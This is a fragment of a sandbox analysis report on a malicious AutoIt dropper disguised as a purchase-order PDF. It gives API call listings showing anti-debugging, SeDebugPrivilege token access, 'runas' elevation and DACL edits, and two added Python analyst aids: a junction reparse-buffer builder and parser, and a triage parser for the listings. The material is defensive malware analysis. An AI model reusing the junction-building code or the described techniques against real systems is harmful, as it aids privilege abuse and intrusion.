• Instruction ID: 730b2dca1b6b09bd6b76555d3316dee95f4818bcffb97f26f8f03165767cfd2f
• Opcode Fuzzy Hash: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
• Instruction Fuzzy Hash: 30416676604340ABE330EB64DC49FEF73E8AFD8714F00891EF649921D1E7B4A645876A
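The call sequence above (CreateDirectoryW, then CreateFileW with dwDesiredAccess 40000000 = GENERIC_WRITE, dwCreationDisposition 00000003 = OPEN_EXISTING and dwFlagsAndAttributes 02200000 = FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, then DeviceIoControl with control code 000900A4 = FSCTL_SET_REPARSE_POINT, with the format string \??\%s among the function's strings, and RemoveDirectoryW on the cleanup path) is the documented way to turn a fresh directory into an NTFS mount point (junction) whose substitute name is an NT path. The report does not show which directory was linked to which target. The following is an added analyst aid, not code from the sample or from Joe Sandbox: it decodes the IOCTL into its CTL_CODE fields, and builds and parses the REPARSE_DATA_BUFFER that such a DeviceIoControl call consumes. Constant values are the documented Windows definitions; the target path at the bottom is a constructed example.

```python
"""Decode FSCTL_SET_REPARSE_POINT and model its mount-point input buffer.

Added analyst aid, not code from the analysed sample or from the sandbox.
Constants are the documented winioctl.h / winnt.h values; the target path
used in the demo is a constructed example, not one observed in the report.
"""
import struct

# winioctl.h CTL_CODE components
FILE_DEVICE_FILE_SYSTEM = 0x9
METHOD_BUFFERED = 0
FILE_ANY_ACCESS = 0
# winnt.h reparse tag for an NTFS junction
IO_REPARSE_TAG_MOUNT_POINT = 0xA0000003
# Control code seen in the DeviceIoControl call at 00434EA9
FSCTL_SET_REPARSE_POINT = 0x000900A4
# The two flags making up dwFlagsAndAttributes 02200000 at 00434E0A
FILE_FLAG_BACKUP_SEMANTICS = 0x02000000
FILE_FLAG_OPEN_REPARSE_POINT = 0x00200000


def ctl_code(device, function, method, access):
    """The CTL_CODE macro from winioctl.h."""
    return (device << 16) | (access << 14) | (function << 2) | method


def decode_ioctl(code):
    """Split a DeviceIoControl control code into its CTL_CODE fields."""
    return {
        "device": (code >> 16) & 0xFFFF,
        "access": (code >> 14) & 0x3,
        "function": (code >> 2) & 0xFFF,
        "method": code & 0x3,
    }


def build_mount_point_reparse_buffer(target, print_name=None):
    """Build the REPARSE_DATA_BUFFER (MountPointReparseBuffer form).

    The substitute name must be an NT path, which is exactly what a
    "\\??\\%s" format string produces. Name lengths are in bytes and
    exclude the UTF-16 NUL terminators, as documented for mount points.
    """
    subst = target if target.startswith("\\??\\") else "\\??\\" + target
    if print_name is None:
        print_name = subst[4:]  # Win32 form without the \??\ prefix
    subst_b = subst.encode("utf-16-le")
    print_b = print_name.encode("utf-16-le")
    path_buffer = subst_b + b"\x00\x00" + print_b + b"\x00\x00"
    names = struct.pack(
        "<HHHH",
        0,                 # SubstituteNameOffset
        len(subst_b),      # SubstituteNameLength
        len(subst_b) + 2,  # PrintNameOffset (skips the NUL)
        len(print_b),      # PrintNameLength
    )
    body = names + path_buffer
    # Header: ReparseTag (ULONG), ReparseDataLength (USHORT), Reserved (USHORT)
    header = struct.pack("<IHH", IO_REPARSE_TAG_MOUNT_POINT, len(body), 0)
    return header + body


def parse_mount_point_reparse_buffer(buf):
    """Inverse of the builder: returns (substitute_name, print_name)."""
    tag, data_len, _reserved = struct.unpack_from("<IHH", buf, 0)
    if tag != IO_REPARSE_TAG_MOUNT_POINT:
        raise ValueError(f"not a mount point reparse tag: {tag:#010x}")
    if len(buf) < 8 + data_len:
        raise ValueError("truncated reparse buffer")
    so, sl, po, pl = struct.unpack_from("<HHHH", buf, 8)
    path = buf[16:8 + data_len]
    return (path[so:so + sl].decode("utf-16-le"),
            path[po:po + pl].decode("utf-16-le"))


if __name__ == "__main__":
    print(decode_ioctl(FSCTL_SET_REPARSE_POINT))
    # Constructed target; the report does not expose the sample's real one.
    buf = build_mount_point_reparse_buffer("C:\\Users\\Public\\drop")
    print(len(buf), parse_mount_point_reparse_buffer(buf))
```

Decoding 000900A4 gives device 9 (FILE_DEVICE_FILE_SYSTEM), function 41 and METHOD_BUFFERED, which is how FSCTL_SET_REPARSE_POINT is defined; that is the quickest way to confirm a raw IOCTL value from a sandbox listing without a header file. The parser is the piece a responder actually reuses: point it at the bytes read back with FSCTL_GET_REPARSE_POINT (or at a forensic copy of the $REPARSE_POINT attribute) to recover where a suspicious junction points.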
APIs
  • Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
• GetLastError.KERNEL32 ref: 004644B4
• GetCurrentThread.KERNEL32 ref: 004644C8
• OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
• GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
• OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                                                            • API String ID: 1312810259-2896544425
                                                                                                                                                                                                                                                                                                            • Opcode ID: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                                                                                                                                                                                                                                                            • Instruction ID: c3f5e6af55eb0da9fa74db60d4f5a84adac3a89a74612fbe59a223ef38337450
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E51A171200201AFD710DF65DD85F5BB7A8AB84704F10892EFB44DB2C1D7B8E844CBAA
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF
                                                                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
                                                                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,00000004), ref: 0040D7D6
                                                                                                                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,00000004), ref: 00431B0E
                                                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,00000004), ref: 00431B3F
                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
                                                                                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(00000000), ref: 00431B92
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004101F0: GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004101F0: LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004101F0: LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004101F0: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                                                                                                                                                                                                                                                                                            • String ID: @GH$@GH$C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                                                                                                                                                                                            • API String ID: 2493088469-2693217653
                                                                                                                                                                                                                                                                                                            • Opcode ID: 69cfb0be49d24e5250ef6e64c59b5ea2b0a961f7c54b5140d3e7fdea8d41d4c7
                                                                                                                                                                                                                                                                                                            • Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69cfb0be49d24e5250ef6e64c59b5ea2b0a961f7c54b5140d3e7fdea8d41d4c7
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E
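The function block above is where this report identifies the dropper as a compiled AutoIt stub: the IsDebuggerPresent check, the "This is a compiled AutoIt script" MessageBoxA text, and the "runas" verb sitting next to ShellExecuteW (an elevation request) all appear in one APIs listing. Reading hundreds of such blocks by hand is slow, so the following is an added example, not Joe Sandbox code and not part of the report, that parses the textual APIs listing format visible on this page and tags a function with the indicators a triager looks for first. The sample block is constructed from the lines above (the sample path is shortened), and the indicator table is this example's own assumption, not a Joe Sandbox signature set.

```python
"""Parse the 'APIs' listing of a Joe Sandbox per-function block and tag it.

Added example, not code from Joe Sandbox or from this report. It consumes
only the textual block format shown on the page. SAMPLE_BLOCK is constructed
from the page's own listing (path shortened); API_TAGS / STRING_TAGS are an
assumed triage table for illustration.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Line shapes observed in the report's APIs listing:
#   • GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
#   • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
#   • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<parent>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[\w@:]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Constructed from the page's listing; the long desktop path is shortened.
SAMPLE_BLOCK = r"""
• GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
  • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\sample.scr.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
• IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
• MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
• GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
• ShellExecuteW.SHELL32(00000000), ref: 00431B92
  • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
  • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
  • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]          # "?" marks an argument the sandbox could not resolve
    ref: int                 # call-site address from "ref:"
    parent: Optional[int]    # subcall function the line belongs to, else None


def parse_api_block(text: str) -> List[ApiCall]:
    """Turn the bullet lines of one APIs section into ApiCall records."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # blank line or a non-API line such as a section header
        args_raw = m.group("args")
        # The report does not quote string arguments, so a literal containing
        # a comma would be split here; none of the page's literals contain one.
        args = args_raw.split(",") if args_raw else []
        parent = m.group("parent")
        calls.append(ApiCall(
            api=m.group("api"), module=m.group("module"), args=args,
            ref=int(m.group("ref"), 16),
            parent=int(parent, 16) if parent else None))
    return calls


def direct_calls(calls: List[ApiCall]) -> List[ApiCall]:
    """Calls made by the function itself, dropping 'Part of subcall' lines."""
    return [c for c in calls if c.parent is None]


# Assumed triage table (this example's own, not a Joe Sandbox signature set).
API_TAGS = {
    "IsDebuggerPresent": "anti-debug",
    "OpenProcess": "process-access",
    "Shell_NotifyIconW": "tray-icon",
}
STRING_TAGS = {
    "This is a compiled AutoIt script": "autoit-compiled",
    "SeDebugPrivilege": "debug-privilege",
}


def flag_indicators(calls: List[ApiCall]) -> set:
    """Tag a function block by the APIs it calls and the literals it passes."""
    tags = set()
    args = [a for c in calls for a in c.args]
    for c in calls:
        if c.api in API_TAGS:
            tags.add(API_TAGS[c.api])
    for a in args:
        for needle, tag in STRING_TAGS.items():
            if needle in a:
                tags.add(tag)
    # ShellExecuteW with the "runas" verb asks the shell to elevate (UAC prompt).
    # The sandbox attributes "runas" to the GetForegroundWindow call site in this
    # block (a stack-slot read), so check at function level, not on ShellExecuteW.
    if "runas" in args and any(c.api == "ShellExecuteW" for c in calls):
        tags.add("elevation-request")
    return tags


if __name__ == "__main__":
    parsed = parse_api_block(SAMPLE_BLOCK)
    for c in direct_calls(parsed):
        print(f"{c.ref:08X}  {c.api}.{c.module}({', '.join(c.args)})")
    print("tags:", sorted(flag_indicators(parsed)))
```

Subcall lines are kept with their parent address rather than discarded, because the report's fuzzy-hash similarity is computed over the whole block, but most triage questions ("does this function itself check for a debugger?") are about direct calls only; `direct_calls` gives that view without re-parsing.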
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
• GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
• __wsplitpath.LIBCMT ref: 004038B2
  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
• _wcscpy.LIBCMT ref: 004038C7
• _wcscat.LIBCMT ref: 004038DC
• SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
  • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
  • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
• _wcscpy.LIBCMT ref: 004039C2
• _wcslen.LIBCMT ref: 00403A53
• _wcslen.LIBCMT ref: 00403AAA
Strings
• Error opening the file, xrefs: 0042B8AC
• #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
• Unterminated string, xrefs: 0042B9BA
• _, xrefs: 00403B48
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                                                                                                                                                                                                                            • API String ID: 4115725249-188983378
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00434C12
• GetFileAttributesW.KERNEL32(?), ref: 00434C4F
• SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
• FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
• FindClose.KERNEL32(00000000), ref: 00434C88
• FindClose.KERNEL32(00000000), ref: 00434C9C
• FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
• SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
• SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
• FindClose.KERNEL32(00000000), ref: 00434D35
• FindClose.KERNEL32(00000000), ref: 00434D43
Similarity
• API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1409584000-438819550
Similarity
• API ID: Timetime$Sleep
• String ID: BUTTON
• API String ID: 4176159691-3405671355
APIs
  • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
  • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
  • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
  • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
• GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
• _memset.LIBCMT ref: 00445E61
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
• GetLengthSid.ADVAPI32(?), ref: 00445E92
• GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
• GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
• GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
• CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
                                                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
                                                                                                                                                                                                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
                                                                                                                                                                                                                                                                                                            • SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3490752873-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                                                                                                                                                                                                                                                            • Instruction ID: 491154c1e478dcf6c9ac3cbca3c2c9e2645d4ee7bbdc2abf5fae4ada557f6fe4
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85519D71108301ABD610DF61CD84E6FB7E9AFC9B04F04491EFA869B242D778E909C76B
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0047AA03
                                                                                                                                                                                                                                                                                                            • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
                                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
                                                                                                                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0047AB7C
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0047AC68
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0047ACCD
                                                                                                                                                                                                                                                                                                            • CoCreateInstanceEx.OLE32 ref: 0047AD06
                                                                                                                                                                                                                                                                                                            • CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            • NULL Pointer assignment, xrefs: 0047AD84
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
